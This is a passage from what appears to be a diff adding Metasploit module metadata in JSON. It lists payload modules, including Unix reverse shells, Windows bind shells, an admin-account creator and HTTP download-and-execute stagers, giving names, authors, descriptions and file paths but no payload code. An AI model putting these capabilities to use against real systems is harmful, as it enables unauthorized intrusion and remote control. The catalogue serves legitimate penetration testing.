"rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via socat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_socat_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ssh": { + "name": "Unix Command Shell, Reverse TCP SSH", + "fullname": "payload/cmd/unix/reverse_ssh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan ", + "hirura" + ], + "description": "Connect back and create a command shell via SSH", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_ssh.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ssh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_ssl_double_telnet": { + "name": "Unix Command Shell, Double Reverse TCP SSL (telnet)", + "fullname": "payload/cmd/unix/reverse_ssl_double_telnet", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm ", + "RageLtMan " + ], + "description": "Creates an interactive shell through two inbound connections, encrypts using SSL via \"-z\" option", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_ssl_double_telnet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_stub": { + "name": "Unix Command Shell, Reverse TCP (stub)", + "fullname": "payload/cmd/unix/reverse_stub", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Creates an interactive shell through an inbound connection (stub only, no payload)", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_stub.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_stub", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_tclsh": { + "name": "Unix Command Shell, Reverse TCP (via Tclsh)", + "fullname": "payload/cmd/unix/reverse_tclsh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bcoles " + ], + "description": "Creates an interactive shell via Tclsh", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-22 05:49:48 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_tclsh.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_tclsh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/reverse_zsh": { + "name": "Unix Command Shell, Reverse TCP (via Zsh)", + "fullname": "payload/cmd/unix/reverse_zsh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Doug Prostko ", + "Wang Yihang " + ], + "description": "Connect back and create a command shell via Zsh. Note: Although Zsh is often\n available, please be aware it isn't usually installed by default.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/reverse_zsh.rb", + "is_install_path": true, + "ref_name": "cmd/unix/reverse_zsh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/adduser": { + "name": "Windows Execute net user /ADD CMD", + "fullname": "payload/cmd/windows/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm ", + "scriptjunkie", + "Chris John Riley" + ], + "description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/adduser.rb", + "is_install_path": true, + "ref_name": "cmd/windows/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/bind_lua": { + "name": "Windows Command Shell, Bind TCP (via Lua)", + "fullname": "payload/cmd/windows/bind_lua", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "xistence " + ], + "description": "Listen for a connection and spawn a command shell via Lua", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb", + "is_install_path": true, + "ref_name": "cmd/windows/bind_lua", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/bind_perl": { + "name": "Windows Command Shell, Bind TCP (via Perl)", + "fullname": "payload/cmd/windows/bind_perl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + "cazz ", + "aushack " + ], + "description": "Listen for a connection and spawn a command shell via perl (persistent)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/bind_perl.rb", + "is_install_path": true, + "ref_name": "cmd/windows/bind_perl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/bind_perl_ipv6": { + "name": "Windows Command Shell, Bind TCP (via perl) IPv6", + "fullname": "payload/cmd/windows/bind_perl_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Samy ", + "cazz ", + "aushack " + ], + "description": "Listen for a connection and spawn a command shell via perl (persistent)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb", + "is_install_path": true, + "ref_name": "cmd/windows/bind_perl_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/bind_ruby": { + "name": "Windows Command Shell, Bind TCP (via Ruby)", + "fullname": "payload/cmd/windows/bind_ruby", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Continually listen for a connection and spawn a command shell via Ruby", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/bind_ruby.rb", + "is_install_path": true, + "ref_name": "cmd/windows/bind_ruby", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/download_eval_vbs": { + "name": "Windows Executable Download and Evaluate VBS", + "fullname": "payload/cmd/windows/download_eval_vbs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scriptjunkie" + ], + "description": "Downloads a file from an HTTP(S) URL and executes it as a vbs script.\n Use it to stage a vbs encoded payload from a short command line.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/download_eval_vbs.rb", + "is_install_path": true, + "ref_name": "cmd/windows/download_eval_vbs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/download_exec_vbs": { + "name": "Windows Executable Download and Execute (via .vbs)", + "fullname": "payload/cmd/windows/download_exec_vbs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scriptjunkie" + ], + "description": "Download an EXE from an HTTP(S) URL and execute it", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/download_exec_vbs.rb", + "is_install_path": true, + "ref_name": "cmd/windows/download_exec_vbs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/generic": { + "name": "Windows Command, Generic Command Execution", + "fullname": "payload/cmd/windows/generic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "juan vazquez " + ], + "description": "Executes the supplied command", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/generic.rb", + "is_install_path": true, + "ref_name": "cmd/windows/generic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/http/x64/custom/bind_ipv6_tcp": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/http/x64/custom/bind_named_pipe": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/http/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/http/x64/custom/bind_tcp": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/http/x64/custom/bind_tcp_rc4": { + "name": "HTTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/http/x64/custom/bind_tcp_uuid": { + "name": "HTTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/http/x64/custom/reverse_http": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_http", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/http/x64/custom/reverse_https": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_https", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/http/x64/custom/reverse_named_pipe": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/http/x64/custom/reverse_tcp": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/http/x64/custom/reverse_tcp_rc4": { + "name": "HTTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/http/x64/custom/reverse_tcp_uuid": { + "name": "HTTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/http/x64/custom/reverse_winhttp": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/http/x64/custom/reverse_winhttps": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/http/x64/encrypted_shell/reverse_tcp": { + "name": "HTTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/encrypted_shell", + "stager_refname": "windows/x64/encrypted_reverse_tcp" + }, + "payload_cmd/windows/http/x64/encrypted_shell_reverse_tcp": { + "name": "HTTP Fetch, Windows Encrypted Reverse Shell", + "fullname": "payload/cmd/windows/http/x64/encrypted_shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn an encrypted command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/encrypted_shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/exec": { + "name": "HTTP Fetch, Windows x64 Execute Command", + "fullname": "payload/cmd/windows/http/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nExecute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + 